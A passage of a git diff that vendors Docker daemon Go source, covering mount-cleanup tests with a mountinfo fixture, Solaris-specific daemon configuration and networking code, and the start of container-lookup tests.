cleanupMounts() error { + return daemon.cleanupMountsByID("") +} + +func getCleanPatterns(id string) (regexps []*regexp.Regexp) { + var patterns []string + if id == "" { + id = "[0-9a-f]{64}" + patterns = append(patterns, "containers/"+id+"/shm") + } + patterns = append(patterns, "aufs/mnt/"+id+"$", "overlay/"+id+"/merged$", "zfs/graph/"+id+"$") + for _, p := range patterns { + r, err := regexp.Compile(p) + if err == nil { + regexps = append(regexps, r) + } + } + return +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go new file mode 100644 index 0000000000..c40b13ba4c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go @@ -0,0 +1,104 @@ +// +build linux + +package daemon + +import ( + "strings" + "testing" +) + +const mountsFixture = `142 78 0:38 / / rw,relatime - aufs none rw,si=573b861da0b3a05b,dio +143 142 0:60 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw +144 142 0:67 / /dev rw,nosuid - tmpfs tmpfs rw,mode=755 +145 144 0:78 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666 +146 144 0:49 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw +147 142 0:84 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw +148 147 0:86 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755 +149 148 0:22 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset +150 148 0:25 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpu rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu +151 148 0:27 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpuacct rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuacct +152 148 0:28 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory +153 148 0:29 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices +154 148 0:30 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer +155 148 0:31 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio +156 148 0:32 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event +157 148 0:33 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb +158 148 0:35 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime - cgroup systemd rw,name=systemd +159 142 8:4 /home/mlaventure/gopath /home/mlaventure/gopath rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +160 142 8:4 /var/lib/docker/volumes/9a428b651ee4c538130143cad8d87f603a4bf31b928afe7ff3ecd65480692b35/_data /var/lib/docker rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +164 142 8:4 /home/mlaventure/gopath/src/github.com/docker/docker /go/src/github.com/docker/docker rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +165 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +166 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/hostname /etc/hostname rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +167 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/hosts /etc/hosts rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +168 144 0:39 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k +169 144 0:12 /14 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000 +83 147 0:10 / /sys/kernel/security rw,relatime - securityfs none rw +89 142 0:87 / /tmp rw,relatime - tmpfs none rw +97 142 0:60 / /run/docker/netns/default rw,nosuid,nodev,noexec,relatime - proc proc rw +100 160 8:4 /var/lib/docker/volumes/9a428b651ee4c538130143cad8d87f603a4bf31b928afe7ff3ecd65480692b35/_data/aufs /var/lib/docker/aufs rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered +115 100 0:102 / /var/lib/docker/aufs/mnt/0ecda1c63e5b58b3d89ff380bf646c95cc980252cf0b52466d43619aec7c8432 rw,relatime - aufs none rw,si=573b861dbc01905b,dio +116 160 0:107 / /var/lib/docker/containers/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k +118 142 0:102 / /run/docker/libcontainerd/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/rootfs rw,relatime - aufs none rw,si=573b861dbc01905b,dio +242 142 0:60 / /run/docker/netns/c3664df2a0f7 rw,nosuid,nodev,noexec,relatime - proc proc rw +120 100 0:122 / /var/lib/docker/aufs/mnt/03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d rw,relatime - aufs none rw,si=573b861eb147805b,dio +171 142 0:122 / /run/docker/libcontainerd/e406ff6f3e18516d50e03dbca4de54767a69a403a6f7ec1edc2762812824521e/rootfs rw,relatime - aufs none rw,si=573b861eb147805b,dio +310 142 0:60 / /run/docker/netns/71a18572176b rw,nosuid,nodev,noexec,relatime - proc proc rw +` + +func TestCleanupMounts(t *testing.T) { + d := &Daemon{ + root: "/var/lib/docker/", + } + + expected := "/var/lib/docker/containers/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/shm" + var unmounted int + unmount := func(target string) error { + if target == expected { + unmounted++ + } + return nil + } + + d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "", unmount) + + if unmounted != 1 { + t.Fatalf("Expected to unmount the shm (and the shm only)") + } +} + +func TestCleanupMountsByID(t *testing.T) { + d := &Daemon{ + root: "/var/lib/docker/", + } + + expected := "/var/lib/docker/aufs/mnt/03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d" + var unmounted int + unmount := func(target string) error { + if target == expected { + unmounted++ + } + return nil + } + + d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d", unmount) + + if unmounted != 1 { + t.Fatalf("Expected to unmount the auf root (and that only)") + } +} + +func TestNotCleanupMounts(t *testing.T) { + d := &Daemon{ + repository: "", + } + var unmounted bool + unmount := func(target string) error { + unmounted = true + return nil + } + mountInfo := `234 232 0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k` + d.cleanupMountsFromReaderByID(strings.NewReader(mountInfo), "", unmount) + if unmounted { + t.Fatalf("Expected not to clean up /dev/shm") + } +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_solaris.go b/vendor/github.com/docker/docker/daemon/daemon_solaris.go new file mode 100644 index 0000000000..2b4d8d0216 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_solaris.go @@ -0,0 +1,523 @@ +// +build solaris,cgo + +package daemon + +import ( + "fmt" + "net" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/reference" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libnetwork/drivers/solaris/bridge" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/netutils" + lntypes "github.com/docker/libnetwork/types" + "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +//#include +import "C" + +const ( + defaultVirtualSwitch = "Virtual Switch" + platformSupported = true + solarisMinCPUShares = 1 + solarisMaxCPUShares = 65535 +) + +func getMemoryResources(config containertypes.Resources) specs.CappedMemory { + memory := specs.CappedMemory{} + + if config.Memory > 0 { + memory.Physical = strconv.FormatInt(config.Memory, 10) + } + + if config.MemorySwap != 0 { + memory.Swap = strconv.FormatInt(config.MemorySwap, 10) + } + + return memory +} + +func getCPUResources(config containertypes.Resources) specs.CappedCPU { + cpu := specs.CappedCPU{} + + if config.CpusetCpus != "" { + cpu.Ncpus = config.CpusetCpus + } + + return cpu +} + +func (daemon *Daemon) cleanupMountsByID(id string) error { + return nil +} + +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + //Since config.SecurityOpt is specifically defined as a "List of string values to + //customize labels for MLs systems, such as SELinux" + //until we figure out how to map to Trusted Extensions + //this is being disabled for now on Solaris + var ( + labelOpts []string + err error + ) + + if len(config.SecurityOpt) > 0 { + return errors.New("Security options are not supported on Solaris") + } + + container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts) + return err +} + +func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { + return nil, nil, nil +} + +func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { + return nil +} + +func (daemon *Daemon) getLayerInit() func(string) error { + return nil +} + +func checkKernel() error { + // solaris can rely upon checkSystem() below, we don't skew kernel versions + return nil +} + +func (daemon *Daemon) getCgroupDriver() string { + return "" +} + +func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { + if hostConfig.CPUShares < 0 { + logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, solarisMinCPUShares) + hostConfig.CPUShares = solarisMinCPUShares + } else if hostConfig.CPUShares > solarisMaxCPUShares { + logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, solarisMaxCPUShares) + hostConfig.CPUShares = solarisMaxCPUShares + } + + if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 { + // By default, MemorySwap is set to twice the size of Memory. + hostConfig.MemorySwap = hostConfig.Memory * 2 + } + + if hostConfig.ShmSize != 0 { + hostConfig.ShmSize = container.DefaultSHMSize + } + if hostConfig.OomKillDisable == nil { + defaultOomKillDisable := false + hostConfig.OomKillDisable = &defaultOomKillDisable + } + + return nil +} + +// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd +func UsingSystemd(config *Config) bool { + return false +} + +// verifyPlatformContainerSettings performs platform-specific validation of the +// hostconfig and config structures. +func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + warnings := []string{} + sysInfo := sysinfo.New(true) + // NOTE: We do not enforce a minimum value for swap limits for zones on Solaris and + // therefore we will not do that for Docker container either. + if hostConfig.Memory > 0 && !sysInfo.MemoryLimit { + warnings = append(warnings, "Your kernel does not support memory limit capabilities. Limitation discarded.") + logrus.Warnf("Your kernel does not support memory limit capabilities. Limitation discarded.") + hostConfig.Memory = 0 + hostConfig.MemorySwap = -1 + } + if hostConfig.Memory > 0 && hostConfig.MemorySwap != -1 && !sysInfo.SwapLimit { + warnings = append(warnings, "Your kernel does not support swap limit capabilities, memory limited without swap.") + logrus.Warnf("Your kernel does not support swap limit capabilities, memory limited without swap.") + hostConfig.MemorySwap = -1 + } + if hostConfig.Memory > 0 && hostConfig.MemorySwap > 0 && hostConfig.MemorySwap < hostConfig.Memory { + return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage.") + } + // Solaris NOTE: We allow and encourage setting the swap without setting the memory limit. + + if hostConfig.MemorySwappiness != nil && *hostConfig.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { + warnings = append(warnings, "Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") + logrus.Warnf("Your kernel does not support memory swappiness capabilities, memory swappiness discarded.") + hostConfig.MemorySwappiness = nil + } + if hostConfig.MemoryReservation > 0 && !sysInfo.MemoryReservation { + warnings = append(warnings, "Your kernel does not support memory soft limit capabilities. Limitation discarded.") + logrus.Warnf("Your kernel does not support memory soft limit capabilities. Limitation discarded.") + hostConfig.MemoryReservation = 0 + } + if hostConfig.Memory > 0 && hostConfig.MemoryReservation > 0 && hostConfig.Memory < hostConfig.MemoryReservation { + return warnings, fmt.Errorf("Minimum memory limit should be larger than memory reservation limit, see usage.") + } + if hostConfig.KernelMemory > 0 && !sysInfo.KernelMemory { + warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities. Limitation discarded.") + logrus.Warnf("Your kernel does not support kernel memory limit capabilities. Limitation discarded.") + hostConfig.KernelMemory = 0 + } + if hostConfig.CPUShares != 0 && !sysInfo.CPUShares { + warnings = append(warnings, "Your kernel does not support CPU shares. Shares discarded.") + logrus.Warnf("Your kernel does not support CPU shares. Shares discarded.") + hostConfig.CPUShares = 0 + } + if hostConfig.CPUShares < 0 { + warnings = append(warnings, "Invalid CPUShares value. Must be positive. Discarding.") + logrus.Warnf("Invalid CPUShares value. Must be positive. Discarding.") + hostConfig.CPUQuota = 0 + } + if hostConfig.CPUShares > 0 && !sysinfo.IsCPUSharesAvailable() { + warnings = append(warnings, "Global zone default scheduling class not FSS. Discarding shares.") + logrus.Warnf("Global zone default scheduling class not FSS. Discarding shares.") + hostConfig.CPUShares = 0 + } + + // Solaris NOTE: Linux does not do negative checking for CPUShares and Quota here. But it makes sense to. + if hostConfig.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod { + warnings = append(warnings, "Your kernel does not support CPU cfs period. Period discarded.") + logrus.Warnf("Your kernel does not support CPU cfs period. Period discarded.") + if hostConfig.CPUQuota > 0 { + warnings = append(warnings, "Quota will be applied on default period, not period specified.") + logrus.Warnf("Quota will be applied on default period, not period specified.") + } + hostConfig.CPUPeriod = 0 + } + if hostConfig.CPUQuota != 0 && !sysInfo.CPUCfsQuota { + warnings = append(warnings, "Your kernel does not support CPU cfs quota. Quota discarded.") + logrus.Warnf("Your kernel does not support CPU cfs quota. Quota discarded.") + hostConfig.CPUQuota = 0 + } + if hostConfig.CPUQuota < 0 { + warnings = append(warnings, "Invalid CPUQuota value. Must be positive. Discarding.") + logrus.Warnf("Invalid CPUQuota value. Must be positive. Discarding.") + hostConfig.CPUQuota = 0 + } + if (hostConfig.CpusetCpus != "" || hostConfig.CpusetMems != "") && !sysInfo.Cpuset { + warnings = append(warnings, "Your kernel does not support cpuset. Cpuset discarded.") + logrus.Warnf("Your kernel does not support cpuset. Cpuset discarded.") + hostConfig.CpusetCpus = "" + hostConfig.CpusetMems = "" + } + cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(hostConfig.CpusetCpus) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset cpus.", hostConfig.CpusetCpus) + } + if !cpusAvailable { + return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s.", hostConfig.CpusetCpus, sysInfo.Cpus) + } + memsAvailable, err := sysInfo.IsCpusetMemsAvailable(hostConfig.CpusetMems) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset mems.", hostConfig.CpusetMems) + } + if !memsAvailable { + return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s.", hostConfig.CpusetMems, sysInfo.Mems) + } + if hostConfig.BlkioWeight > 0 && !sysInfo.BlkioWeight { + warnings = append(warnings, "Your kernel does not support Block I/O weight. Weight discarded.") + logrus.Warnf("Your kernel does not support Block I/O weight. Weight discarded.") + hostConfig.BlkioWeight = 0 + } + if hostConfig.OomKillDisable != nil && !sysInfo.OomKillDisable { + *hostConfig.OomKillDisable = false + // Don't warn; this is the default setting but only applicable to Linux + } + + if sysInfo.IPv4ForwardingDisabled { + warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.") + logrus.Warnf("IPv4 forwarding is disabled. Networking will not work") + } + + // Solaris NOTE: We do not allow setting Linux specific options, so check and warn for all of them. + + if hostConfig.CapAdd != nil || hostConfig.CapDrop != nil { + warnings = append(warnings, "Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") + logrus.Warnf("Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.") + hostConfig.CapAdd = nil + hostConfig.CapDrop = nil + } + + if hostConfig.GroupAdd != nil { + warnings = append(warnings, "Additional groups unsupported on Solaris.Discarding groups lists.") + logrus.Warnf("Additional groups unsupported on Solaris.Discarding groups lists.") + hostConfig.GroupAdd = nil + } + + if hostConfig.IpcMode != "" { + warnings = append(warnings, "IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") + logrus.Warnf("IPC namespace assignment unsupported on Solaris.Discarding IPC setting.") + hostConfig.IpcMode = "" + } + + if hostConfig.PidMode != "" { + warnings = append(warnings, "PID namespace setting unsupported on Solaris. Running container in host PID namespace.") + logrus.Warnf("PID namespace setting unsupported on Solaris. Running container in host PID namespace.") + hostConfig.PidMode = "" + } + + if hostConfig.Privileged { + warnings = append(warnings, "Privileged mode unsupported on Solaris. Discarding privileged mode setting.") + logrus.Warnf("Privileged mode unsupported on Solaris. Discarding privileged mode setting.") + hostConfig.Privileged = false + } + + if hostConfig.UTSMode != "" { + warnings = append(warnings, "UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") + logrus.Warnf("UTS namespace assignment unsupported on Solaris.Discarding UTS setting.") + hostConfig.UTSMode = "" + } + + if hostConfig.CgroupParent != "" { + warnings = append(warnings, "Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.") + logrus.Warnf("Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.") + hostConfig.CgroupParent = "" + } + + if hostConfig.Ulimits != nil { + warnings = append(warnings, "Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") + logrus.Warnf("Specifying ulimits unsupported on Solaris. Discarding ulimits setting.") + hostConfig.Ulimits = nil + } + + return warnings, nil +} + +// platformReload update configuration with platform specific options +func (daemon *Daemon) platformReload(config *Config) map[string]string { + return map[string]string{} +} + +// verifyDaemonSettings performs validation of daemon config struct +func verifyDaemonSettings(config *Config) error { + + if config.DefaultRuntime == "" { + config.DefaultRuntime = stockRuntimeName + } + if config.Runtimes == nil { + config.Runtimes = make(map[string]types.Runtime) + } + stockRuntimeOpts := []string{} + config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary, Args: stockRuntimeOpts} + + // checkSystem validates platform-specific requirements + return nil +} + +func checkSystem() error { + // check OS version for compatibility, ensure running in global zone + var err error + var id C.zoneid_t + + if id, err = C.getzoneid(); err != nil { + return fmt.Errorf("Exiting. Error getting zone id: %+v", err) + } + if int(id) != 0 { + return fmt.Errorf("Exiting because the Docker daemon is not running in the global zone") + } + + v, err := kernel.GetKernelVersion() + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 5, Major: 12, Minor: 0}) < 0 { + return fmt.Errorf("Your Solaris kernel version: %s doesn't support Docker. Please upgrade to 5.12.0", v.String()) + } + return err +} + +// configureMaxThreads sets the Go runtime max threads threshold +// which is 90% of the kernel setting from /proc/sys/kernel/threads-max +func configureMaxThreads(config *Config) error { + return nil +} + +// configureKernelSecuritySupport configures and validate security support for the kernel +func configureKernelSecuritySupport(config *Config, driverName string) error { + return nil +} + +func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { + netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) + if err != nil { + return nil, err + } + + controller, err := libnetwork.New(netOptions...) + if err != nil { + return nil, fmt.Errorf("error obtaining controller instance: %v", err) + } + + // Initialize default network on "null" + if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)); err != nil { + return nil, fmt.Errorf("Error creating default 'null' network: %v", err) + } + + if !config.DisableBridge { + // Initialize default driver "bridge" + if err := initBridgeDriver(controller, config); err != nil { + return nil, err + } + } + + return controller, nil +} + +func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { + if n, err := controller.NetworkByName("bridge"); err == nil { + if err = n.Delete(); err != nil { + return fmt.Errorf("could not delete the default bridge network: %v", err) + } + } + + bridgeName := bridge.DefaultBridgeName + if config.bridgeConfig.Iface != "" { + bridgeName = config.bridgeConfig.Iface + } + netOption := map[string]string{ + bridge.BridgeName: bridgeName, + bridge.DefaultBridge: strconv.FormatBool(true), + netlabel.DriverMTU: strconv.Itoa(config.Mtu), + bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), + } + + // --ip processing + if config.bridgeConfig.DefaultIP != nil { + netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() + } + + var ipamV4Conf *libnetwork.IpamConf + + ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + + nwList, _, err := netutils.ElectInterfaceAddresses(bridgeName) + if err != nil { + return errors.Wrap(err, "list bridge addresses failed") + } + + nw := nwList[0] + if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return errors.Wrap(err, "parse CIDR failed") + } + // Iterate through in case there are multiple addresses for the bridge + for _, entry := range nwList { + if fCIDR.Contains(entry.IP) { + nw = entry + break + } + } + } + + ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String() + hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask) + if hip.IsGlobalUnicast() { + ipamV4Conf.Gateway = nw.IP.String() + } + + if config.bridgeConfig.IP != "" { + ipamV4Conf.PreferredPool = config.bridgeConfig.IP + ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) + if err != nil { + return err + } + ipamV4Conf.Gateway = ip.String() + } else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" { + logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) + } + + if config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return err + } + + ipamV4Conf.SubPool = fCIDR.String() + } + + if config.bridgeConfig.DefaultGatewayIPv4 != nil { + ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() + } + + v4Conf := []*libnetwork.IpamConf{ipamV4Conf} + v6Conf := []*libnetwork.IpamConf{} + + // Initialize default network on "bridge" with the same name + _, err = controller.NewNetwork("bridge", "bridge", "", + libnetwork.NetworkOptionDriverOpts(netOption), + libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), + libnetwork.NetworkOptionDeferIPv6Alloc(false)) + if err != nil { + return fmt.Errorf("Error creating default 'bridge' network: %v", err) + } + return nil +} + +// registerLinks sets up links between containers and writes the +// configuration out for persistence. +func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { + return nil +} + +func (daemon *Daemon) cleanupMounts() error { + return nil +} + +// conditionalMountOnStart is a platform specific helper function during the +// container start to call mount. +func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { + return daemon.Mount(container) +} + +// conditionalUnmountOnCleanup is a platform specific helper function called +// during the cleanup of a container to unmount. +func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + return daemon.Unmount(container) +} + +func restoreCustomImage(is image.Store, ls layer.Store, rs reference.Store) error { + // Solaris has no custom images to register + return nil +} + +func driverOptions(config *Config) []nwconfig.Option { + return []nwconfig.Option{} +} + +func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { + return nil, nil +} + +// setDefaultIsolation determine the default isolation mode for the +// daemon to run in. This is only applicable on Windows +func (daemon *Daemon) setDefaultIsolation() error { + return nil +} + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + return types.RootFS{} +} + +func setupDaemonProcess(config *Config) error { + return nil +} + +func (daemon *Daemon) setupSeccompProfile() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_test.go b/vendor/github.com/docker/docker/daemon/daemon_test.go new file mode 100644 index 0000000000..00817bd1b6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_test.go @@ -0,0 +1,627 @@ +// +build !solaris + +package daemon + +import ( + "io/ioutil" + "os" + "path/filepath" + "reflect" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/discovery" + _ "github.com/docker/docker/pkg/discovery/memory" + "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/truncindex" + "github.com/docker/docker/registry" + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/store" + "github.com/docker/go-connections/nat" +) + +// +// https://github.com/docker/docker/issues/8069 +// + +func TestGetContainer(t *testing.T) { + c1 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", + Name: "tender_bardeen", + }, + } + + c2 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de", + Name: "drunk_hawking", + }, + } + + c3 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57", + Name: "3cdbd1aa", + }, + } + + c4 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5", + Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57", + }, + } + + c5 := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b", + Name: "d22d69a2b896", + }, + } + + store := container.NewMemoryStore() + store.Add(c1.ID, c1) + store.Add(c2.ID, c2) + store.Add(c3.ID, c3) + store.Add(c4.ID, c4) + store.Add(c5.ID, c5) + + index := truncindex.NewTruncIndex([]string{}) + index.Add(c1.ID) + index.Add(c2.ID) + index.Add(c3.ID) + index.Add(c4.ID) + index.Add(c5.ID) + + daemon := &Daemon{ + containers: store, + idIndex: index, + nameIndex: registrar.NewRegistrar(), + } + + daemon.reserveName(c1.ID, c1.Name) + daemon.reserveName(c2.ID, c2.Name) + daemon.reserveName(c3.ID, c3.Name) + daemon.reserveName(c4.ID, c4.Name) + daemon.reserveName(c5.ID, c5.Name) + + if container, _ := daemon.GetContainer("3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de"); container != c2 { + t.Fatal("Should explicitly match full container IDs") + } + + if container, _ := daemon.GetContainer("75fb0b8009"); container != c4 { + t.Fatal("Should match a partial ID") + } + + if container, _ := daemon.GetContainer("drunk_hawking"); container != c2 { + t.Fatal("Should match a full name") + } + + // c3.Name is a partial match for both c3.ID and c2.ID + if c, _ := daemon.GetContainer("3cdbd1aa"); c != c3 { + t.Fatal("Should match a full name even though it collides with another container's ID") + } + + if container, _ := daemon.GetContainer("d22d69a2b896"); container != c5 { + t.Fatal("Should match a container where the provided prefix is an exact match to the its name, and is also a prefix for its ID") + } + + if _, err := daemon.GetContainer("3cdbd1"); err == nil { + t.Fatal("Should return an error when provided a prefix that partially matches multiple container ID's") + } + + if _, err := daemon.GetContainer("nothing"); err == nil { + t.Fatal("Should return an error when provided a prefix that is neither a name or a partial match to an ID") + } +} + +func initDaemonWithVolumeStore(tmp string) (*Daemon, error) { + var err error + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + daemon.volumes, err = store.New(tmp) + if err != nil { + return nil, err + } + + volumesDriver, err := local.New(tmp, 0, 0) + if err != nil { + return nil, err + } + volumedrivers.Register(volumesDriver, volumesDriver.Name()) + + return daemon, nil +} + +func TestValidContainerNames(t *testing.T) { + invalidNames := []string{"-rm", 